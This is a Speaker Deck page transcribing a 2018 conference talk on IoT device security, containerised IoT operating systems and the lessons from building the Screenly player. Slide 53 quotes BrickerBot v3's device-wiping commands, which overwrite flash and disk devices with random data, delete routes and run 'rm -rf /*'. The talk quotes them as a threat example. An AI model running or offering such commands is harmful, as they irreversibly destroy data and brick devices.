Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The 'S' in IoT Stands for Security (a.k.a. Inte...

Viktor Petersson
August 31, 2018
Technology
0
310

The 'S' in IoT Stands for Security (a.k.a. Internet of Shit)

Viktor Petersson

August 31, 2018
Tweet

More Decks by Viktor Petersson

See All by Viktor Petersson
Navigating the SBOM landscape: Formats, relevance, and tooling in 2024 @ BSides Bristol '24
vpetersson
0
27
State of Open Con '24
vpetersson
0
52
From Pets to Cattle
vpetersson
0
120
Beyond Just a Menu Display
vpetersson
0
65
The history of how Screenly OSE became the most popular digital signage project on GitHub
vpetersson
0
140
The DevSecOps Iceberg @ Cloud Native London
vpetersson
0
360
What's mtLS? @ Docker London
vpetersson
0
480
The "S" in "IoT" stands for "Security"
vpetersson
0
210
Living on the Edge @ Kubernetes London
vpetersson
0
110

Other Decks in Technology

See All in Technology
BLADE: An Attempt to Automate Penetration Testing Using Autonomous AI Agents
bbrbbq
0
290
AIチャットボット開発への生成AI活用
ryomrt
0
170
B2B SaaSから見た最近のC#/.NETの進化
sansantech
PRO
0
670
元旅行会社の情シス部員が教えるおすすめなre:Inventへの行き方 / What is the most efficient way to re:Invent
naospon
2
330
[CV勉強会@関東 ECCV2024 読み会] オンラインマッピング x トラッキング MapTracker: Tracking with Strided Memory Fusion for Consistent Vector HD Mapping (Chen+, ECCV24)
abemii
0
220
10XにおけるData Contractの導入について: Data Contract事例共有会
10xinc
5
570
Shopifyアプリ開発における Shopifyの機能活用
sonatard
4
250
AWS Lambda のトラブルシュートをしていて思うこと
kazzpapa3
2
170
スクラムチームを立ち上げる〜チーム開発で得られたもの・得られなかったもの〜
ohnoeight
2
350
複雑なState管理からの脱却
sansantech
PRO
1
140
OCI Security サービス 概要
oracle4engineer
PRO
0
6.5k
Taming you application's environments
salaboy
0
180

Featured

See All Featured
GraphQLの誤解/rethinking-graphql
sonatard
67
10k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
229
52k
[RailsConf 2023] Rails as a piece of cake
palkan
52
4.9k
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
47
5k
YesSQL, Process and Tooling at Scale
rocio
169
14k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
38
1.8k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
48k
A Modern Web Designer's Workflow
chriscoyier
693
190k
Scaling GitHub
holman
458
140k
How GitHub (no longer) Works
holman
310
140k
Side Projects
sachag
452
42k

Transcript

  1. Internet of Shit The ”S” in “IoT” stands for ”Security”

  2. I’m: - Andy - Dev-like - Sec-ish - Ops-y

  3. None

  4. Viktor (@vpetersson) • Entrepreneur, geek, tinkerer • Mediocre developer •

    OK-ish at DevOps • Founder of Screenly (and a few other things)

  5. Digital signage made easy

  6. © xkcd The sad state of ”smart” devices

  7. “The Internet of Things is a science project focused on

    creating the most complex way possible of turning the lights on.” @domguinard
  8. None
  9. None
  10. None
  11. None
  12. None
  13. None
  14. None

  15. https://www.theregister.co.uk/2016/03/25/vnc_roulette/ https://www.tomsguide.com/us/pictures-story/748-vnc-roulette-slideshow.html#s12

  16. What This Talk is About • IoT: The State of

    the Art • How Containers Can Help • Botnets and Brickerbots • Building Better Devices

  17. IoT: The State of the Art

  18. https://www.wired.com/2016/08/jeep-hackers-return-high-speed-steering-acceleration-hacks/ •

  19. http://money.cnn.com/2017/01/09/technology/fda-st-jude-cardiac-hack/

  20. None
  21. None
  22. None
  23. None
  24. None
  25. None

  26. How We Think IoT Devices Run

  27. How IoT Devices Actually Run

  28. None

  29. Blockchain all da thingz!

  30. Containers and IoT

  31. Containers to the Rescue! Containers to the Rescue!

  32. Modern IoT Operating Systems ( )

  33. OS OTA Process Isolation State resin.io X X Stable Ubuntu

    Core X X Stable eliot X X Proof of Concept Mender X - Beta (?) ACRN - X Beta (?)
  34. None
  35. None
  36. None
  37. None

  38. Container Oriented IoT Kernel Scheduler / Management App container

  39. • “git push master resin” • Yocto based • Application

    isolated • Isolation tool: Balena
  40. None
  41. None

  42. • Alpha • Heavily inspired by CoreOS / Kubernetes •

    Isolation tool: Docker
  43. None

  44. • Smaller footprint than “Classic” • Lots of “read-only” •

    Interfaces, slots and plugs • Snaps, Docker and LXD • (Primary) Isolation tool: AppArmor
  45. None

  46. - Untrusted Domain

  47. - Untrusted Domain • Restricted host filesystem access • Restricted

    host APIs • Restricted to application-specific user data • More isolation than a rogue nation state

  48. - Untrusted Domain • Restricted host filesystem access • Restricted

    host APIs • Restricted to application-specific user data • More isolation than a rogue nation state • Possible GDPR compliance

  49. - Trusted Domain • Built from the Ubuntu archive •

    Archive integrity guaranteed by package maintainers • May or may not run confined ◦ Access to resource or data in the user’s session ◦ Limited system service access (DAC/capability/policy permitting)

  50. - Trusted Domain https://developer.ubuntu.com/static/resources/ubuntu-core-16-security-whitepaper.pdf

  51. https://www.networkworld.com/article/3128372/internet-of-things/ddos-at tacks-using-iot-devices-follow-the-manchurian-candidate-model.html

  52. None

  53. # BrickerBot v3 device logic $ busybox cat /dev/urandom >/dev/mtdblock0

    & $ busybox cat /dev/urandom >/dev/sda & $ busybox cat /dev/urandom >/dev/mtdblock10 & $ busybox cat /dev/urandom >/dev/mmc0 & $ busybox cat /dev/urandom >/dev/sdb & $ busybox cat /dev/urandom >/dev/ram0 & $ busybox cat /dev/urandom >/dev/mtd0 & $ busybox cat /dev/urandom >/dev/mtd1 & $ busybox cat /dev/urandom >/dev/mtdblock1 & $ busybox cat /dev/urandom >/dev/mtdblock2 & $ busybox cat /dev/urandom >/dev/mtdblock3 & $ fdisk -C 1 -H 1 -S1 /dev/mtd0 w $ fdisk -C 1 -H 1 -S1 /dev/mtd1 w $ fdisk -C 1 -H 1 -S1 /dev/sda w $ fdisk -C 1 -H 1 -S1 /dev/mtdblock0 w $ route del default;iproute del default;ip route del default; rm -rf /* 2>/dev/null & sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1 $ halt -n -f $ reboot

  54. Defence Against the Dark Botnets

  55. None
  56. None
  57. None
  58. None

  59. IPv6 IPv6

  60. IPv6

  61. Building Better IoT Devices

  62. http://www.ideaeconomics.org/guerracartoons/2015/2/11/race-to-the-bottom

  63. Device life cycle

  64. Common mistakes

  65. Designing Better IoT Devices

  66. Kubernetes? Istio? VirtualKubelet?

  67. Azure IoT Edge Connector for Kubernetes https://github.com/Azure/iot-edge-virtual-kubelet-provider

  68. Lessons learned from Screenly

  69. Screenly 1 Player + + + +

  70. Screenly 2 Player criteria • Disk images built on CI

    • Process isolation (perhaps using containers) • Transactional updates (app and OS) ◦ Automatic roll-back • Not having to manage the OS layer ourselves ◦ Must be locked down/Hardened by default • Bonus: Cryptographically signed updates

  71. Screenly 2 Player + +

  72. Recap

  73. Conclusion • IoT security is an afterthought at best •

    The new breed of containerised IoT platforms greatly enhance the update and security story • We can fix life cycle and runtime security • Patch your devices!

  74. @sublimino @controlplaneio @vpetersson @screenlyapp